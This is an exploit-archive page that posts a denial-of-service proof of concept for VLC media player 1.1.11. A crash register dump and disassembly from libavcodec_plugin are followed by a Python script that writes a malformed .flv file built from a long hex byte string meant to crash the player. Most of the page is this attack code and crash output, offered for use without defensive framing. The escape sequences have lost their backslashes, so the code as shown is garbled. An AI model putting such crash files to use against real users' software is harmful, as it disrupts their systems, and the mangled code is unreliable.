Home / exploits

PDF

VLC Media Player 1.1.11 Denial Of Service

Posted on 14 March 2012

###########################################################################################################
Application : VLC media player <= 1.1.11 (.flv) Denial of Service
Date : 12/03/2012
Auther : Senator of Pirates
E-Mail : Senator.of.Pirates.team@gmail.com
FaceBook : /SenatorofPirates
Greetz : i greet to Gjoko 'LiquidWorm' Krstic, Matias Chroren ... ,and my friends in anywhere and also
every Moroccan in USA,Canada,Europe,... wherever and i would say "Sahra Maghribia" there is not western sahara
there is only Morocco from Tangier to Lagouira.
############################################################################################################
Bug :
----
Registers:
eax=01487000 ebx=01503dc0 ecx=00010001 edx=0000a041 esi=0000a03e edi=01503dc0
eip=04cb4ad3 esp=0320f5b0 ebp=00000000 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
Disasembly:
04cb4ac0 8d5603 lea edx,[esi+3]
04cb4ac3 3954243c cmp dword ptr [esp+3Ch],edx
04cb4ac7 7e28 jle libavcodec_plugin!vlc_entry__1_1_0g+0x243771 (04cb4af1)
04cb4ac9 8b442448 mov eax,dword ptr [esp+48h]
04cb4acd 8b4c243c mov ecx,dword ptr [esp+3Ch]
04cb4ad1 01f0 add eax,esi
04cb4ad3 803800 cmp byte ptr [eax],0 ds:0023:01487000=?? <= Crash
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesVideoLANVLCpluginslibavcodec_plugin.dll -
############################################################################################################
Proof Of Concept:
----------------
Data = ("x46x4cx56x01x05x00x00x00x09x00x00x00x00x12x00x00"
"xb8x00x00x00x00x00x00x00x02x00x0ax6fx6ex4dx65x74"
"x61x44x61x74x61x08x00x00x00x08x00x08x64x75x72x61"
"x74x69x6fx6ex00x3fxf6x49xbax5ex35x3fx7dx00x05x77"
"x69x64x74x68x00x40x84x00x00x00x00x00x00x00x06x68"
"x65x69x67x68x74x00x40x76x80x00x00x00x00x00x00x0d"
"x76x69x64x65x6fx64x61x74x61x72x61x74x65x00x40x84"
"x24x00x00x00x00x00x00x09x66x72x61x6dx65x72x61x74"
"x65x00x40x37xf8xe7x79x20x7dx4ex00x0cx76x69x64x65"
"x6fx63x6fx64x65x63x69x64x00x40x1cx00x00x00x00x00"
"x00x00x0dx61x75x64x69x6fx64x61x74x61x72x61x74x65"
"x00x40x5bxe0x00x00x00x00x00x00x0cx61x75x64x69x6f"
"x63x6fx64x65x63x69x64x00x40x24x00x00x00x00x00x00"
"x00x00x00xc3x08x00x00x04x00x00x00x00x00x00x00xaf"
"x00x12x10x00x00x00xd2x09x00x00x2dx00x00x00x00x00"
"x00x00x17x00x00x00x00x01x4dx40x1exffxe1x00x19x67"
"x4dx40x1ex92x42x01x40x5fxf2xe0x22x00x00x03x00xfa"
"x00x00x2exffxffxffxffxffxffxffxffxffxeex32xc8x00"
"x00x01x0ax08x00x00x0bx00x00x00x00x00x00x00xafx01"
"x21x00x49x90x02x19x00x23x80x00x00x01x20x09x00x02"
"x85x00x00x00x00x00x00x00x17x01x00x00x00x00x00x02"
"x7cx65x88x80x80x02x7fxfexbdx67xe6x59x3dxb6x7fx2b"
"x00xc2x41x28xefxe4x09x51x5cx71x42xa2x4ax4cx56x46"
"xe7x4ex08x9fxbdxe7x5exa9x86xf2x54xf0xa9x88x44xdd"
"xc0xf5x84x64xeex17xa5x02xb4x97x85x32x9dx02xaaxb6"
"x0ax31xc0x5cx50xacx85x9cxc6x85x9axebxfcx6ex7ex41"
"x9dx06x2fxa1x55xe7x54x81x66x30xadx94x0dx00xbax06"
"xcax96x2cxfaxf0xa7xe9x70xf2xdcx79x7bx39xf3x05x88"
"x8cx9fxc9x5cx52x2ax17xadxeaxe3xa6xd6x4dx0cx25x77"
"x75x7bxb0x3ax4fx20x08x34xcexe4x19x65x92xf1xb0xa4"
"x49xd4x3ax0cx0ax48xd3xa2xafxb1xc7x3exeax39xb5x62"
"xddxb9xc8x11x78x7fx33x1bx93x86xa6x04x61xd8xd2x42"
"x77xffx13xd0x38x76x82x1ex71x79x26x49xb3xa3x5bx89"
"x65x33x98xeex9dxbcxafx5bx63xd4xbbx1dx28x7ax58x91"
"x51x0fx78x18xa5x0dxe3x7cxf6x87x78x75x42x18x9dxe8"
"x1cx4dxdcx66x31xefxf5xb2x73x80xecx64xd5x17xe5x2a"
"xc6x81xd1x1ex39xbcx59xc9xb0x03x4fxdex13xebx19xf8"
"x8dx00x00x00x00x00x00x00x00x00x00x00x00x00xb4x36"
"x95x90xa5x2bx68x70x0cxd7x4ex13x88x70x8dx80x30x8a"
"x12x46xc0xc7x61xccx14x22x40x88x65x17x28x88x98x9a"
"x7cxfax00x02x0dx00x00x00x00x00x00x00x52x4ax4dx44"
"x00x00x00x01x00x00x01xf9x00x00x00x00x00x00x00x00"
"x00x00x00x1dx00x00x00x22x00x00x00x01x00x00x00x01"
"x00x00x00x00x01x00x00x00x00x2ax00x00x00x01x00x00"
"x01xcfx00x00x00x09x00x00x00x00x00x00x00x27x00x00"
"x00x2cx00x00x00x08x00x00x00x0bx53x74x61x74x69x73"
"x74x69x63x73x00x00x00x00x01x00x00x00x00x6cx00x00"
"x00x01x00x00x00x99x00x00x00x01x00x00x00xc8x00x00"
"x00x01x00x00x00xf2x00x00x00x01x00x00x01x1dx00x00"
"x00x01x00x00x01x48x00x00x00x01x00x00x01x74x00x00"
"x00x01x00x00x01xa5x00x00x00x01x00x00x00x2dx00x00"
"x00x04x00x00x00x01x00x00x00x25x00x00x00x2dx00x00"
"x00x00x00x00x00x09x43x68x61x6ex6ex65x6cx73x00x00"
"x00x00x04x02x00x00x00x00x00x00x2fx00x00x00x01x00"
"x00x00x03x00x00x00x26x00x00x00x2fx00x00x00x00x00"
"x00x00x0ax45x78x74x65x6ex73x69x6fx6ex00x00x00x00"
"x05x2ex66x6cx76x00x00x00x00x2ax00x00x00x03x00x00"
"x00x03x00x00x00x25x00x00x00x2ax00x00x00x00x00x00"
"x00x09x48x61x73x56x69x64x65x6fx00x00x00x00x01x01"
"x00x00x00x2bx00x00x00x04x00x00x00x01x00x00x00x23"
"x00x00x00x2bx00x00x00x00x00x00x00x07x48x65x69x67"
"x68x74x00x00x00x00x04x68x01x00x00x00x00x00x2bx00"
"x00x00x04x00x00x00x00x00x00x00x23x00x00x00x2bx00"
"x00x00x00x00x00x00x07x4cx65x6ex67x74x68x00x00x00"
"x00x04x85x05x00x00x00x00x00x2cx00x00x00x04x00x00"
"x00x01x00x00x00x24x00x00x00x2cx00x00x00x00x00x00"
"x00x08x51x75x61x6cx69x74x79x00x00x00x00x04x44x8b"
"x0bx00x00x00x00x31x00x00x00x04x00x00x00x01x00x00"
"x00x29x00x00x00x31x00x00x00x00x00x00x00x0dx56x69"
"x64x65x6fx42x69x74x72x61x74x65x00x00x00x00x04x28"
"xd7x09x00x00x00x00x2ax00x00x00x04x00x00x00x01x00"
"x00x00x22x00x00x00x2ax00x00x00x00x00x00x00x06x57"
"x69x64x74x68x00x00x00x00x04x80x02x00x00x52");
payload = (Data)
f = open("PoC.flv","wb")
f.write(payload)
f.close()

 

TOP